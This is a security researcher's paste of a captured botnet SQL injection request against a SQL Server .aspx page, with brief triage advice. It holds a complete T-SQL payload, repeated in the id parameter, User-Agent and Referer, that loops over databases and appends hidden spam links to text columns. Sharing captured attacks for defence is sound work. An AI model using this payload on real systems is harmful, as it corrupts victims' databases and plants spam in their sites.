Neonprimetime

pagerank botnet sql injection example

Jan 19th, 2016
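  1. Pagerank botnet: captured SQL injection attempt against a SQL Server-backed .aspx page. The same T-SQL payload is appended to the id query parameter, the User-Agent header and the Referer header, so any of the three that reaches a string-built query is affected. The payload loops over every accessible non-system database and appends a hidden <div> containing a spam link to varchar-type columns whose maximum length is -1 or 2147483647, on roughly one update in ten. For triage, search those columns for the hidden div and the linked domain, and treat request headers as untrusted input bound through parameterized queries.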
  2. *******
  3. Source IP : 50.97.138.113
  4.  
  5. GET /page.aspx?id=6';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''pharmacy discount coupons ''+char(60)+''a href="http:''+char(47)+char(47)+''aaamlog.com''+char(47)+''coupons"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''click'''' when 1 then ''''aaamlog.com'''' else ''''aaamlog.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' walgreen printable coupon''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- HTTP/1.1
  6. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">pharmacy discount coupons <a href="http://aaamlog.com/coupons">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''click'''' when 1 then ''''aaamlog.com'''' else ''''aaamlog.com'''' end +''''</a> walgreen printable coupon</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
  7. Referer: http://google.com';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%10 when 0 then ''''<div style="display:none">pharmacy discount coupons <a href="http:/aaamlog.com/coupons">''''+case abs(checksum(newid()))3 when 0 then ''''click'''' when 1 then ''''aaamlog.com'''' else ''''aaamlog.com'''' end +''''</a> walgreen printable coupon</div>'''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  9. Accept-Encoding: gzip,deflate,gzip, deflate
  10. Connection: Keep-Alive
  11.  
  12. *******
  13. *******
  14. *******
  15. More from @neonprimetime security
  16.  
  17. http://pastebin.com/u/Neonprimetime
  18. https://www.virustotal.com/en/user/neonprimetime/
  19. https://twitter.com/neonprimetime
  20. https://www.reddit.com/user/neonprimetime